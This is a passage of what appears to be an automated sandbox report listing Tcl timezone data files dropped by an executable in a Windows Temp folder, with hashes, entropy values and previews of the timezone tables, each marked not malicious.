                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Indiana/Indianapolis)]} {. LoadTimeZoneFile America/Indiana/Indianapolis.}.set TZData(:America/Fort_Wayne) $TZData(:America/Indiana/Indianapolis).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1394
                                                                                                                                                                                                                                                    Entropy (8bit):3.9968678665202413
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:cQVe5qc+Ih+j+Dd+HO+W+iW+M+A+ph+h/1+ge5+Wt+x3+evIG+M+w+w+jZ+SIrX5:5WP+Ih+j+R+u+W+iW+M+A+r+hN+gU+Wo
                                                                                                                                                                                                                                                    MD5:FC299CE2BCD4303BC0F5600111428585
                                                                                                                                                                                                                                                    SHA1:D08B49D8B5E983765F4D3D24359E1896177F7429
                                                                                                                                                                                                                                                    SHA-256:1272363FC2F2AC38F10ED82E0869B2250BA9A29136BBE8EBEF3727CDE4EBF937
                                                                                                                                                                                                                                                    SHA-512:DE2CC7D3EAF987F775437995EEBE663DA0DF952838B701EC15E67BC098337580948983805A00BAEA9E95420C63F53A7443B2F813B67ECAE2C9D86E604946321F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Fortaleza) {. {-9223372036854775808 -9240 0 LMT}. {-1767216360 -10800 0 BRT}. {-1206957600 -7200 1 BRST}. {-1191362400 -10800 0 BRT}. {-1175374800 -7200 1 BRST}. {-1159826400 -10800 0 BRT}. {-633819600 -7200 1 BRST}. {-622069200 -10800 0 BRT}. {-602283600 -7200 1 BRST}. {-591832800 -10800 0 BRT}. {-570747600 -7200 1 BRST}. {-560210400 -10800 0 BRT}. {-539125200 -7200 1 BRST}. {-531352800 -10800 0 BRT}. {-191365200 -7200 1 BRST}. {-184197600 -10800 0 BRT}. {-155163600 -7200 1 BRST}. {-150069600 -10800 0 BRT}. {-128898000 -7200 1 BRST}. {-121125600 -10800 0 BRT}. {-99954000 -7200 1 BRST}. {-89589600 -10800 0 BRT}. {-68418000 -7200 1 BRST}. {-57967200 -10800 0 BRT}. {499748400 -7200 1 BRST}. {511236000 -10800 0 BRT}. {530593200 -7200 1 BRST}. {540266400 -10800 0 BRT}. {562129200 -7200 1 BRST}. {571197600 -10800 0 BRT}. {592974000 -72
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8099
                                                                                                                                                                                                                                                    Entropy (8bit):3.737123408653655
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Glace_Bay) {. {-9223372036854775808 -14388 0 LMT}. {-2131646412 -14400 0 AST}. {-1632074400 -10800 1 ADT}. {-1615143600 -14400 0 AST}. {-880221600 -10800 1 AWT}. {-769395600 -10800 1 APT}. {-765399600 -14400 0 AST}. {-536443200 -14400 0 AST}. {-526500000 -10800 1 ADT}. {-513198000 -14400 0 AST}. {-504907200 -14400 0 AST}. {63086400 -14400 0 AST}. {73461600 -10800 1 ADT}. {89182800 -14400 0 AST}. {104911200 -10800 1 ADT}. {120632400 -14400 0 AST}. {126244800 -14400 0 AST}. {136360800 -10800 1 ADT}. {152082000 -14400 0 AST}. {167810400 -10800 1 ADT}. {183531600 -14400 0 AST}. {199260000 -10800 1 ADT}. {215586000 -14400 0 AST}. {230709600 -10800 1 ADT}. {247035600 -14400 0 AST}. {262764000 -10800 1 ADT}. {278485200 -14400 0 AST}. {294213600 -10800 1 ADT}. {309934800 -14400 0 AST}. {325663200 -10800 1 ADT}. {341384400 -14400 0 AST}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7306
                                                                                                                                                                                                                                                    Entropy (8bit):3.7801111303444968
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Godthab) {. {-9223372036854775808 -12416 0 LMT}. {-1686083584 -10800 0 WGT}. {323845200 -7200 0 WGST}. {338950800 -10800 0 WGT}. {354675600 -7200 1 WGST}. {370400400 -10800 0 WGT}. {386125200 -7200 1 WGST}. {401850000 -10800 0 WGT}. {417574800 -7200 1 WGST}. {433299600 -10800 0 WGT}. {449024400 -7200 1 WGST}. {465354000 -10800 0 WGT}. {481078800 -7200 1 WGST}. {496803600 -10800 0 WGT}. {512528400 -7200 1 WGST}. {528253200 -10800 0 WGT}. {543978000 -7200 1 WGST}. {559702800 -10800 0 WGT}. {575427600 -7200 1 WGST}. {591152400 -10800 0 WGT}. {606877200 -7200 1 WGST}. {622602000 -10800 0 WGT}. {638326800 -7200 1 WGST}. {654656400 -10800 0 WGT}. {670381200 -7200 1 WGST}. {686106000 -10800 0 WGT}. {701830800 -7200 1 WGST}. {717555600 -10800 0 WGT}. {733280400 -7200 1 WGST}. {749005200 -10800 0 WGT}. {764730000 -7200 1 WGST}. {7804548
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):10015
                                                                                                                                                                                                                                                    Entropy (8bit):3.780383775128893
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Goose_Bay) {. {-9223372036854775808 -14500 0 LMT}. {-2713895900 -12652 0 NST}. {-1640982548 -12652 0 NST}. {-1632076148 -9052 1 NDT}. {-1615145348 -12652 0 NST}. {-1609446548 -12652 0 NST}. {-1096921748 -12600 0 NST}. {-1072989000 -12600 0 NST}. {-1061670600 -9000 1 NDT}. {-1048973400 -12600 0 NST}. {-1030221000 -9000 1 NDT}. {-1017523800 -12600 0 NST}. {-998771400 -9000 1 NDT}. {-986074200 -12600 0 NST}. {-966717000 -9000 1 NDT}. {-954624600 -12600 0 NST}. {-935267400 -9000 1 NDT}. {-922570200 -12600 0 NST}. {-903817800 -9000 1 NDT}. {-891120600 -12600 0 NST}. {-872368200 -9000 0 NWT}. {-769395600 -9000 1 NPT}. {-765401400 -12600 0 NST}. {-757369800 -12600 0 NST}. {-746044200 -9000 1 NDT}. {-733347000 -12600 0 NST}. {-714594600 -9000 1 NDT}. {-701897400 -12600 0 NST}. {-683145000 -9000 1 NDT}. {-670447800 -12600 0 NST}. {-6516954
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2387
                                                                                                                                                                                                                                                    Entropy (8bit):3.855782030917648
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Grand_Turk) {. {-9223372036854775808 -17072 0 LMT}. {-2524504528 -18431 0 KMT}. {-1827687169 -18000 0 EST}. {284014800 -18000 0 EST}. {294217200 -14400 1 EDT}. {309938400 -18000 0 EST}. {325666800 -14400 1 EDT}. {341388000 -18000 0 EST}. {357116400 -14400 1 EDT}. {372837600 -18000 0 EST}. {388566000 -14400 1 EDT}. {404892000 -18000 0 EST}. {420015600 -14400 1 EDT}. {436341600 -18000 0 EST}. {452070000 -14400 1 EDT}. {467791200 -18000 0 EST}. {483519600 -14400 1 EDT}. {499240800 -18000 0 EST}. {514969200 -14400 1 EDT}. {530690400 -18000 0 EST}. {544604400 -14400 1 EDT}. {562140000 -18000 0 EST}. {576054000 -14400 1 EDT}. {594194400 -18000 0 EST}. {607503600 -14400 1 EDT}. {625644000 -18000 0 EST}. {638953200 -14400 1 EDT}. {657093600 -18000 0 EST}. {671007600 -14400 1 EDT}. {688543200 -18000 0 EST}. {702457200 -14400 1 EDT}. {71
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):202
                                                                                                                                                                                                                                                    Entropy (8bit):4.877543794488217
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Grenada) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):205
                                                                                                                                                                                                                                                    Entropy (8bit):4.914669229343752
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit.if {![info exists TZData(America/Port_of_Spain)]} {. LoadTimeZoneFile America/Port_of_Spain.}.set TZData(:America/Guadeloupe) $TZData(:America/Port_of_Spain).
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):385
                                                                                                                                                                                                                                                    Entropy (8bit):4.450029420195016
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Guatemala) {. {-9223372036854775808 -21724 0 LMT}. {-1617040676 -21600 0 CST}. {123055200 -18000 1 CDT}. {130914000 -21600 0 CST}. {422344800 -18000 1 CDT}. {433054800 -21600 0 CST}. {669708000 -18000 1 CDT}. {684219600 -21600 0 CST}. {1146376800 -18000 1 CDT}. {1159678800 -21600 0 CST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):182
                                                                                                                                                                                                                                                    Entropy (8bit):4.957616449865346
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:3:SlEVFRKvJT8QFx52IAcGE5qJkXGm2OHHjGevX5lH6owsXSicUTpvaPAv:SlSWB9X529056m2OHHjGeP5lahicKpiS
                                                                                                                                                                                                                                                    MD5:2E9AE527CE849A35219EF68F3BECA3AD
                                                                                                                                                                                                                                                    SHA1:6C3D12907122383FED9C6F65D3F38E7D1CE43761
                                                                                                                                                                                                                                                    SHA-256:D9AB34DF36DF3AADA024B093E8F73EAE43B4B56CAF8EFB00D82A518E44979C66
                                                                                                                                                                                                                                                    SHA-512:540DE179EE5D716537C3E7C184CD098A281D59D285A4E5E7733AC28A0F17F644E7F192EFD76DE5D7EEB80D91754D8B2579DCDDC49296AF433CEA10A5EE405F5F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Guayaquil) {. {-9223372036854775808 -19160 0 LMT}. {-2524502440 -18840 0 QMT}. {-1230749160 -18000 0 ECT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):237
                                                                                                                                                                                                                                                    Entropy (8bit):4.722702793311002
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSWB9X52905R3Lm2OHRjGeTShVy4YiwNUSY6KcVVFLIB/z:MBp5290LLmdHVTiy45NSOc/VG/z
                                                                                                                                                                                                                                                    MD5:8D1F3433552E24E8C97DDE88DFCC070F
                                                                                                                                                                                                                                                    SHA1:992FBE19E858ADDBF228D1FFCF3E2A8ED860CEE0
                                                                                                                                                                                                                                                    SHA-256:619CE2809A31BF685A74F0D54E9433A5557796C73B9337CAB7CC19980352DBAF
                                                                                                                                                                                                                                                    SHA-512:89A80E8744117131854BD65F21F5FDF4BA22C215DD99C0DAD5144F0D01D3C19160085E28293682EF8FEDA8AE244FDA8BA3E3199D233D9B7EAAD4EC6D8A73BBAE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Guyana) {. {-9223372036854775808 -13960 0 LMT}. {-1730578040 -13500 0 GBGT}. {-113688900 -13500 0 GYT}. {176010300 -10800 0 GYT}. {662698800 -14400 0 GYT}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):10763
                                                                                                                                                                                                                                                    Entropy (8bit):3.724988391778253
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:Y7Z1hubfVmv0SqJXDiFHrbm96qddObEn/RDzWRfQFQ4XL8vG+81VcfnrpbXXnqvo:823ZLYvuOZJv
                                                                                                                                                                                                                                                    MD5:7DE8E355A725B3D9B3FD06A838B9715F
                                                                                                                                                                                                                                                    SHA1:41C6AAEA03FC7FEED50CFFFC4DFF7F35E2B1C23D
                                                                                                                                                                                                                                                    SHA-256:5F65F38FFA6B05C59B21DB98672EB2124E4283530ACB01B22093EAEFB256D116
                                                                                                                                                                                                                                                    SHA-512:4C61A15DDF28124343C1E6EFE068D15E48F0662534486EC38A4E2731BE085CDA5856F884521EF32A6E0EDD610A8A491A722220BDD1BAF2A9652D8457778AF696
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Halifax) {. {-9223372036854775808 -15264 0 LMT}. {-2131645536 -14400 0 AST}. {-1696276800 -10800 1 ADT}. {-1680469200 -14400 0 AST}. {-1640980800 -14400 0 AST}. {-1632074400 -10800 1 ADT}. {-1615143600 -14400 0 AST}. {-1609444800 -14400 0 AST}. {-1566763200 -10800 1 ADT}. {-1557090000 -14400 0 AST}. {-1535486400 -10800 1 ADT}. {-1524949200 -14400 0 AST}. {-1504468800 -10800 1 ADT}. {-1493413200 -14400 0 AST}. {-1472414400 -10800 1 ADT}. {-1461963600 -14400 0 AST}. {-1440964800 -10800 1 ADT}. {-1429390800 -14400 0 AST}. {-1409515200 -10800 1 ADT}. {-1396731600 -14400 0 AST}. {-1376856000 -10800 1 ADT}. {-1366491600 -14400 0 AST}. {-1346616000 -10800 1 ADT}. {-1333832400 -14400 0 AST}. {-1313956800 -10800 1 ADT}. {-1303678800 -14400 0 AST}. {-1282507200 -10800 1 ADT}. {-1272661200 -14400 0 AST}. {-1251057600 -10800 1 ADT}. {-1240088400
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8444
                                                                                                                                                                                                                                                    Entropy (8bit):3.7372403334059547
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:VXA0Bc0tTJtNliQ4sxgpuG4c2JPTxUw9Or2ocrPGSyM9Gk4LK46MCf7VkXgySCWv:VXA0Bc0tTJtNliQ4sxSuG4c2JPTxUw9F
                                                                                                                                                                                                                                                    MD5:C436FDCDBA98987601FEFC2DBFD5947B
                                                                                                                                                                                                                                                    SHA1:A04CF2A5C9468C634AED324CB79F9EE3544514B7
                                                                                                                                                                                                                                                    SHA-256:32F8B4D03E4ACB466353D72DAA2AA9E1E42D454DBBA001D0B880667E6346B8A1
                                                                                                                                                                                                                                                    SHA-512:56C25003685582AF2B8BA4E32EFF03EF10F4360D1A12E0F1294355000161ADDF7024CBD047D1830AB884BE2C385FD8ABE8DA5C30E9A0671C22E84EE3BF957D85
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Havana) {. {-9223372036854775808 -19768 0 LMT}. {-2524501832 -19776 0 HMT}. {-1402813824 -18000 0 CST}. {-1311534000 -14400 1 CDT}. {-1300996800 -18000 0 CST}. {-933534000 -14400 1 CDT}. {-925675200 -18000 0 CST}. {-902084400 -14400 1 CDT}. {-893620800 -18000 0 CST}. {-870030000 -14400 1 CDT}. {-862171200 -18000 0 CST}. {-775681200 -14400 1 CDT}. {-767822400 -18000 0 CST}. {-744231600 -14400 1 CDT}. {-736372800 -18000 0 CST}. {-144702000 -14400 1 CDT}. {-134251200 -18000 0 CST}. {-113425200 -14400 1 CDT}. {-102542400 -18000 0 CST}. {-86295600 -14400 1 CDT}. {-72907200 -18000 0 CST}. {-54154800 -14400 1 CDT}. {-41457600 -18000 0 CST}. {-21495600 -14400 1 CDT}. {-5774400 -18000 0 CST}. {9954000 -14400 1 CDT}. {25675200 -18000 0 CST}. {41403600 -14400 1 CDT}. {57729600 -18000 0 CST}. {73458000 -14400 1 CDT}. {87364800 -18000 0 CST}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):595
                                                                                                                                                                                                                                                    Entropy (8bit):4.2803367804689785
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:MBp5290ebmdH5NWw+Ux++vTQtFlvm0tFXtFjV5a:cQBe5gfUT7UFltF9FjV5a
                                                                                                                                                                                                                                                    MD5:9D1A1746614CE2CEE26D066182938CDC
                                                                                                                                                                                                                                                    SHA1:967590403A84E80ED299B8D548A2B37C8EEB21CE
                                                                                                                                                                                                                                                    SHA-256:493DB3E7B56B2E6B266A5C212CD1F75F1E5CF57533DA03BB1C1F2449543B9F48
                                                                                                                                                                                                                                                    SHA-512:DFAE6BC48F2E4B75DD6744AEE57D31D6A6E764D02DCA5731C7B516AD87B9BAB2FEB355A012EC38BDD53008B501B0744953EB7E0677F02B9EAF083D2E66042B37
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Hermosillo) {. {-9223372036854775808 -26632 0 LMT}. {-1514739600 -25200 0 MST}. {-1343066400 -21600 0 CST}. {-1234807200 -25200 0 MST}. {-1220292000 -21600 0 CST}. {-1207159200 -25200 0 MST}. {-1191344400 -21600 0 CST}. {-873828000 -25200 0 MST}. {-661539600 -28800 0 PST}. {28800 -25200 0 MST}. {828867600 -21600 1 MDT}. {846403200 -25200 0 MST}. {860317200 -21600 1 MDT}. {877852800 -25200 0 MST}. {891766800 -21600 1 MDT}. {909302400 -25200 0 MST}. {915174000 -25200 0 MST}.}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6996
                                                                                                                                                                                                                                                    Entropy (8bit):3.799188069575817
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:uRXxWMzJ2eQzURWu3N7sHRwvOTFhP5S+ijFnRaJeaX1eyDt:uRXxWUJ2eQzURWu3NOqvOTFhPI1jFIL
                                                                                                                                                                                                                                                    MD5:154A332C3ACF6D6F358B07D96B91EBD1
                                                                                                                                                                                                                                                    SHA1:FC16E7CBE179B3AB4E0C2A61AB5E0E8C23E50D50
                                                                                                                                                                                                                                                    SHA-256:C0C7964EBF9EA332B46D8B928B52FDE2ED15ED2B25EC664ACD33DA7BF3F987AE
                                                                                                                                                                                                                                                    SHA-512:5831905E1E6C6FA9DD309104B3A2EE476941D6FF159764123A477E2690C697B0F19EDEA0AD0CD3BBBECF96D64DC4B981027439E7865FCB1632661C8539B3BD6C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Indianapolis) {. {-9223372036854775808 -20678 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-1577901600 -21600 0 CST}. {-900259200 -18000 1 CDT}. {-891795600 -21600 0 CST}. {-883591200 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-757360800 -21600 0 CST}. {-747244800 -18000 1 CDT}. {-733942800 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-702493200 -21600 0 CST}. {-684345600 -18000 1 CDT}. {-671043600 -21600 0 CST}. {-652896000 -18000 1 CDT}. {-639594000 -21600 0 CST}. {-620841600 -18000 1 CDT}. {-608144400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):8470
                                                                                                                                                                                                                                                    Entropy (8bit):3.7546412701514034
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:AXxr2eQzURWu3Oab9BxXI6X8xYIIOdXkqbfkeTzZSJw5/9/yuvQ+hcr8bYkzbXw6:AXxr2eQzUwu3Oab9BxXI6XUYIIOdXkqv
                                                                                                                                                                                                                                                    MD5:E8AFD9E320A7F4310B413F8086462F31
                                                                                                                                                                                                                                                    SHA1:7BEE624AAC096E9C280B4FC84B0671381C657F6C
                                                                                                                                                                                                                                                    SHA-256:BE74C1765317898834A18617352DF3B2952D69DE4E294616F1554AB95824DAF0
                                                                                                                                                                                                                                                    SHA-512:C76620999A293FA3A93CA4615AB78F19395F12CC08C242F56BFD4C4CAF8BC769DDEBF33FF10F7DA5A3EFD8ED18792362780188636075419014A8C099A897C43C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Knox) {. {-9223372036854775808 -20790 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-725824800 -21600 0 CST}. {-715795200 -18000 1 CDT}. {-702493200 -21600 0 CST}. {-684345600 -18000 1 CDT}. {-671043600 -21600 0 CST}. {-652896000 -18000 1 CDT}. {-639594000 -21600 0 CST}. {-620841600 -18000 1 CDT}. {-608144400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-557942400 -18000 1 CDT}. {-544640400 -21600 0 CST}. {-526492800 -18000 1 CDT}. {-513190800 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-463593600 -18000 1 CDT}. {-447267600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-415818000 -21600 0 CST}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7037
                                                                                                                                                                                                                                                    Entropy (8bit):3.786429098558221
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Marengo) {. {-9223372036854775808 -20723 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-599594400 -21600 0 CST}. {-589392000 -18000 1 CDT}. {-576090000 -21600 0 CST}. {-495043200 -18000 1 CDT}. {-481741200 -21600 0 CST}. {-463593600 -18000 1 CDT}. {-450291600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-418237200 -21600 0 CST}. {-400089600 -18000 1 CDT}. {-386787600 -21600 0 CST}. {-368640000 -18000 1 CDT}. {-355338000 -21600 0 CST}. {-337190400 -18000 1 CDT}. {-323888400 -21600 0 CST}. {-305740800 -18000 1 CDT}. {-292438800 -21600 0 CST}. {-273686400 -18000 0 EST}. {-31518000 -18000 0 EST}. {-21488400 -14400 1 EDT}. {-5767200 -18000 0 EST}. {
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7364
                                                                                                                                                                                                                                                    Entropy (8bit):3.79636789874872
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/tclZIC.tcl - do not edit..set TZData(:America/Indiana/Petersburg) {. {-9223372036854775808 -20947 0 LMT}. {-2717647200 -21600 0 CST}. {-1633276800 -18000 1 CDT}. {-1615136400 -21600 0 CST}. {-1601827200 -18000 1 CDT}. {-1583686800 -21600 0 CST}. {-880214400 -18000 1 CWT}. {-769395600 -18000 1 CPT}. {-765392400 -21600 0 CST}. {-473364000 -21600 0 CST}. {-462996000 -18000 1 CDT}. {-450291600 -21600 0 CST}. {-431539200 -18000 1 CDT}. {-418237200 -21600 0 CST}. {-400089600 -18000 1 CDT}. {-386787600 -21600 0 CST}. {-368640000 -18000 1 CDT}. {-355338000 -21600 0 CST}. {-337190400 -18000 1 CDT}. {-323888400 -21600 0 CST}. {-305740800 -18000 1 CDT}. {-292438800 -21600 0 CST}. {-273686400 -18000 1 CDT}. {-257965200 -21600 0 CST}. {-242236800 -18000 1 CDT}. {-226515600 -21600 0 CST}. {-210787200 -18000 1 CDT}. {-195066000 -21600 0 CST}. {-179337600 -18000 1 CDT}. {-163616400 -21600 0 CST
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6992
                                                                                                                                                                                                                                                    Entropy (8bit):3.7768650637181533
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
